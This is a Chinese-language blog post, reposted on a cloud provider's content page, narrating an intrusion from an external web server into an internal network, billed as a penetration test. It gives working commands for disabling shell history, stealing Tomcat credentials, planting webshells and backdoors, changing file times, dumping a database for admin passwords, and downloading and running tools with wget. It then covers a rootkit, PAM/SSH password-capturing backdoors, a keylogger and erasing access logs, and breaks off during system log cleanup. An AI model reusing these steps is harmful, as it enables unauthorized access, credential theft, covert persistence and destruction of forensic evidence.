[原創] 一次滲透測試過程--從外網進內網

來源:互聯網
上載者:User

標籤:

最近內網許可權掉了,  需要重新找外網的入口進內網,
用鳳凰掃描器產生字典掃了一下弱口令,人肉查看了c段上的一些web, 掃了掃連接埠,發現13這台機器上跑了一個wingsoft的軟體, 在烏雲上找到了一個漏洞, 用st2 -005 漏洞獲得一個cmdshell


0x02  進入邊界伺服器

執行 unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0  

複製代碼


使系統不記錄我們的操作記錄
用預設的工具上不去webshell,看了下web目錄, chmod 777 +r /js/  加了可寫入權限, 依然webshell上不去,  使用wget -O /web/js/help.jsp www.xxx.com/shell.txt  也寫入不了檔案

執行

  1. locate tomcat-user.xml
  2. cat /mulu/tomcat-user.xml
複製代碼



找到密碼以後進入tomcat後台,部署war包擷取webshell,  進去了以後,部署一句話後門若干, 並修改掉檔案建立的時間,開始在webshell 上收集資訊,為內網滲透做準備

netstat -tlnp   //查看內網連過來那些連接埠

10.19.1.56

10.19.1.66
192.168.1.184

10.19.1.150 

10.22.1.222   

10.22.1.249

[size=14.399999618530273px]10.22.1.249

翻一番設定檔。找資料庫在10.48.14.52 網段串連進去把褲子拖出來, 尋找管理員的密碼, 翻到3個管理員(*陳,劉*,彭*) 記錄下他的密碼,看了下

  1. python -h
  2. nmap -h  發現環境裡有python環境
複製代碼


上insightscan.py 去掃描下 然而報錯了(),上傳鳳凰掃描器準備增加一點許可權, 上傳出錯, 採用檔案下載的方式來安裝鳳凰掃描器

  1. wget -O /tmp/xx.zip http://www.baidu.com/xx.zip
  2. unzip /tmp/xx.zip 
  3. chmod 777 ff
  4. ./ff 
複製代碼

提示缺少動態串連褲 (tmux: error while loading shared libraries: libevent-1.4.so.2: cannot open shared object file: No such file or directory
)百度了一下

原因一般有兩個, 一個是作業系統裡確實沒有包含該共用庫(lib*.so.*檔案)或者共用庫版本不對, 遇到這種情況那就去網上下載並安裝上即可.另外一個原因就是已經安裝了該共用庫, 但執行需要調用該共用庫的程式的時候, 程式按照預設共用庫路徑找不到該共用庫檔案.參考串連:http://www.jb51.net/article/35383.htm0x03 許可權維持(1)安裝rootkit安裝的應用級的rootkit,基本就是一個加密的nc,配置好連接埠 root 和密碼就可以了(2)安裝pam後門記錄root密碼本地是root許可權,我們需要本地的root密碼,在/etc/shadow解密不了的情況下, 可以安裝pam後門或者ssh後門記錄root密碼
  1. 擷取pam版本:rpm -qa|grep pam
複製代碼參考:http://www.freebuf.com/articles/system/24104.htmlhttp://www.nxadmin.com/system/1199.html

 

(3)安裝keylogerhttps://github.com/dorneanu/ixkeylog/0x04 日誌清理

 

(1) web日誌的清理
  1. awk ‘!/123.123.123.123|111.111.111.111|phpspy.php/‘ /var/log/httpd/access_log > temp && mv temp /var/log/httpd/access_log
  1. touch -amt 200901231532 檔案名稱   這樣把時間改回來
  2. 當然 也有批量修改時間的小技巧
  3. ls|xargs touch -amt 200901231532   #這句話就可以直接改時間

(2)系統日誌的清理 

[原創] 一次滲透測試過程--從外網進內網

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.